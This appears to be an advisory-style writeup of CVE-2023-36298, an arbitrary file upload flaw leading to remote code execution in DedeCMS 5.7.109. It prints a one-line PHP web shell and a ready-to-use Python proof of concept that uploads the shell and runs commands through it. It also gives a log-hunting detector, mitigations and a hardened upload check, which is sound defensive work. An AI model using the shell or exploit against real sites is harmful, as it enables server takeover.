DedeCMS is a popular open source content management system mostly used in Chinese-speaking regions. In version 5.7.109, a critical security bug (CVE-2023-36298) lets attackers upload malicious files and gain full control over the web server: an arbitrary file upload that leads to Remote Code Execution (RCE).
This long read shows how the flaw works, demonstrates the exploit with code samples, and explains how to protect your site. If you run DedeCMS, or assess sites that do, read on.
What is the CVE-2023-36298 Vulnerability?
The vulnerability comes from weak checks in DedeCMS's file upload functionality. Attackers can upload files such as .php scripts into a directory the web server serves. They then request the file's URL in a browser, and the server executes their code with the privileges of the web server process, which gives them control of the site and a foothold on the host.
Why Does It Happen?
The root cause is that DedeCMS's upload module does not properly validate file types and extensions. Attackers get past the filter with double or uppercase extensions (evil.php.jpg or EVIL.PHP), which slip through a case-sensitive blacklist that only inspects the last extension, or with crafted POST requests that send PHP code under an image Content-Type. Whether such a file then executes depends on the web server's handler configuration, for example an Apache setup that hands any filename containing .php to PHP.
See the vulnerability announcements:
- GitHub Advisory
- Chinese PoC writeup
- Exploit DB Ref
Step-by-Step Exploit Details
Let's walk through a proof-of-concept for CVE-2023-36298, using both description and real code.
1. Find a File Upload Function
Usually after logging in as an admin or regular user (but sometimes even unauthenticated), DedeCMS offers an image/file upload feature. The vulnerable endpoint is often something like:
/dede/dialog/select_images_post.php
Attackers create a simple PHP web shell. Here's an example (evil.php):
<?php system($_GET['cmd']); ?>
This shell runs whatever system command is passed in the cmd URL parameter.
The upload handler performs no MIME-type verification of the actual file contents, so the declared Content-Type can be anything. Attackers also rename the PHP file to evil.jpg or evil.PHP. Note that an uppercase extension only executes if the server matches handlers case-insensitively, and a .jpg name only pays off if the server is misconfigured to execute it or the name is rewritten later, so which variant works depends on the target's configuration.
A typical HTTP request to upload the file (using Python requests):
import requests

url = 'http://target.com/dede/dialog/select_images_post.php'
cookies = {'PHPSESSID': 'your-session-here'}  # Only if authentication is needed
# Send evil.php under a spoofed image Content-Type; the server never inspects the bytes
with open('evil.php', 'rb') as fh:
    files = {'imgfile': ('evil.php', fh, 'image/jpeg')}
    r = requests.post(url, files=files, cookies=cookies)
print(r.text)
If the upload is accepted, you'll see a server response with the image/file path.
Once the file is uploaded, just visit it in your browser:
http://target.com/uploads/allimg/202406/evil.php?cmd=whoami
If successful, the output of whoami will be visible, showing you have code execution.
1. Open the file upload page (admin or user portal).
2. Upload evil.php as if it were an image, changing the file extension, Content-Type, or filename as described above until one variant is accepted.
Here is a ready-to-use proof of concept:
import re
import requests

url = 'http://target.com/dede/dialog/select_images_post.php'
# Update the session cookie if authentication is required
cookies = {'PHPSESSID': 'insert-valid-session-here'}
# Prepare the payload file: PHP code declared as an image
files = {'imgfile': ('evil.php', '<?php system($_GET["cmd"]);?>', 'image/jpeg')}
# Send the upload request
response = requests.post(url, files=files, cookies=cookies)
print("Server Response:\n", response.text)
# The script echoes back the stored path (e.g. /uploads/allimg/202406/evil.php);
# pull it out of the response and fall back to that example path if it is not found
match = re.search(r'/uploads/\S+?\.php', response.text)
shell_path = match.group(0) if match else '/uploads/allimg/202406/evil.php'
shell_url = 'http://target.com' + shell_path
command = 'whoami'  # Or any system command
exec_response = requests.get(shell_url, params={'cmd': command})
print("Command Output:\n", exec_response.text)
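What the exploit above leaves behind in the web server's access log, and a small hunt for it. This is an added example, not code from the original writeup or from DedeCMS: the log lines are constructed (RFC 5737 test addresses), the log format is assumed to be Apache/Nginx combined format, and the /uploads/ tree and the upload endpoint path are taken from the PoC above. Any request for a server-side script extension under the upload tree is flagged, and rated high when the same client posted to the upload endpoint earlier in the log.

```python
import re
from typing import Dict, List

# Combined log format as written by Apache/Nginx (assumption: the site logs this way).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Server-side script extensions, including double-extension forms such as evil.php.jpg.
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)(?:\.|$)")
# Upload tree and upload endpoint named in the writeup above.
UPLOAD_PREFIX = "/uploads/"
UPLOAD_ENDPOINT = "/dede/dialog/select_images_post.php"

# Constructed sample lines, not a real capture.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Aug/2023:15:20:01 +0000] "GET /dede/dialog/select_images.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Aug/2023:15:20:09 +0000] "POST /dede/dialog/select_images_post.php HTTP/1.1" 200 412 "-" "python-requests/2.31.0"',
    '203.0.113.5 - - [03/Aug/2023:15:20:15 +0000] "GET /uploads/allimg/202406/evil.php?cmd=whoami HTTP/1.1" 200 18 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [03/Aug/2023:15:21:00 +0000] "GET /uploads/allimg/202406/photo.jpg HTTP/1.1" 200 58213 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [03/Aug/2023:15:22:30 +0000] "GET /uploads/allimg/202406/shell.php.jpg HTTP/1.1" 200 22 "-" "curl/8.1.2"',
]


def find_webshell_hits(lines: List[str]) -> List[Dict[str, str]]:
    """Flag requests for script files under the upload tree; escalate when the
    same client already posted to the upload endpoint earlier in the log."""
    uploaders = set()  # client IPs seen posting to the upload endpoint
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path, _, query = m.group("target").partition("?")
        if m.group("method") == "POST" and path == UPLOAD_ENDPOINT:
            uploaders.add(m.group("ip"))
            continue
        if path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT_RE.search(path.lower()):
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": path,
                "query": query,
                "status": m.group("status"),
                # upload then execution from one client is the exploit sequence above
                "severity": "high" if m.group("ip") in uploaders else "medium",
            })
    return findings


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit["severity"].upper(), hit["ip"], hit["time"], hit["path"], hit["query"])
```

Run it against the real access log with `find_webshell_hits(open(path).read().splitlines())`; a 404 hit is still worth keeping, since it shows someone probing for a shell that was cleaned up or never landed.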
How to Protect Your Site
- Update Immediately: If a patch or newer version is available, apply it.
- Restrict File Types: Only allow safe extensions such as .jpg and .png, and verify them *server-side*: compare the lowercased name against an allowlist, check every extension segment rather than just the last one, inspect the file's leading bytes instead of trusting the declared Content-Type, and store the upload under a server-generated name.
- Block Execution in the Upload Directory: The rule below refuses every request to /uploads/, which also stops legitimate images from being served, and uses Apache 2.2 syntax (Apache 2.4 needs mod_access_compat or Require all denied). A narrower rule that denies only script extensions, or turns the PHP engine off for that directory, keeps images working while still preventing an uploaded shell from running.
# .htaccess in /uploads/
Deny from all
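The bypasses described earlier (uppercase extension, double extension, PHP code under an image Content-Type) run against a model of a weak upload filter, beside a hardened server-side check of the kind the list above recommends. This is an added example in Python, not DedeCMS code: the weak filter is an illustrative model rather than DedeCMS's actual logic, and the extension allowlist and magic-byte table are assumptions for an image-only upload endpoint.

```python
import os
import secrets
from typing import Optional

# Extensions an image-upload endpoint should accept (assumption for this example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of each allowed format, checked instead of the client's Content-Type.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_check(filename: str, content_type: str) -> bool:
    """Model of a weak filter (not DedeCMS's real code): a case-sensitive blacklist
    that looks only at the final extension and otherwise trusts the Content-Type."""
    ext = filename.rsplit(".", 1)[-1]
    if ext in ("php", "php5", "phtml"):
        return False
    return content_type.startswith("image/")


def hardened_check(filename: str, data: bytes) -> Optional[str]:
    """Return a server-generated storage name, or None if the upload is rejected."""
    # Drop any directory components so ../ in the name cannot relocate the file.
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None  # no extension, or a bare ".php"-style name
    # Every extension segment must be allowlisted: evil.php.jpg yields ['php', 'jpg'].
    exts = parts[1:]
    if any(e not in ALLOWED_EXTENSIONS for e in exts):
        return None
    ext = exts[-1]
    # The Content-Type header is attacker-controlled; inspect the bytes instead.
    if not data.startswith(MAGIC[ext]):
        return None
    # Never reuse the caller's name; a random name also defeats overwrite attempts.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16          # constructed JPEG header
    php = b"<?php system($_GET['cmd']); ?>"            # the web shell from the writeup
    for name, ctype, data in [
        ("EVIL.PHP", "image/jpeg", php),
        ("evil.php.jpg", "image/jpeg", php),
        ("evil.jpg", "image/jpeg", php),
        ("photo.jpg", "application/octet-stream", jpeg),
    ]:
        print(f"{name:14} weak={weak_check(name, ctype)!s:5} hardened={hardened_check(name, data)}")
```

The weak model accepts EVIL.PHP and evil.php.jpg (the two extension tricks from the writeup) while the hardened check rejects both, rejects a PHP payload named evil.jpg because its bytes are not a JPEG, and accepts a real JPEG even when the client sent a generic Content-Type.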
Conclusion
CVE-2023-36298 is a textbook example of a dangerous file upload vulnerability leading to remote code execution in DedeCMS v5.7.109. All site operators should patch or mitigate immediately.
References
- GitHub Issue
- Exploit-DB 51521
- Sina CSDN PoC (Chinese)
If you have any questions or need incident help, feel free to ask.
Timeline
Published on: 08/03/2023 15:15:00 UTC
Last modified on: 08/07/2023 13:06:00 UTC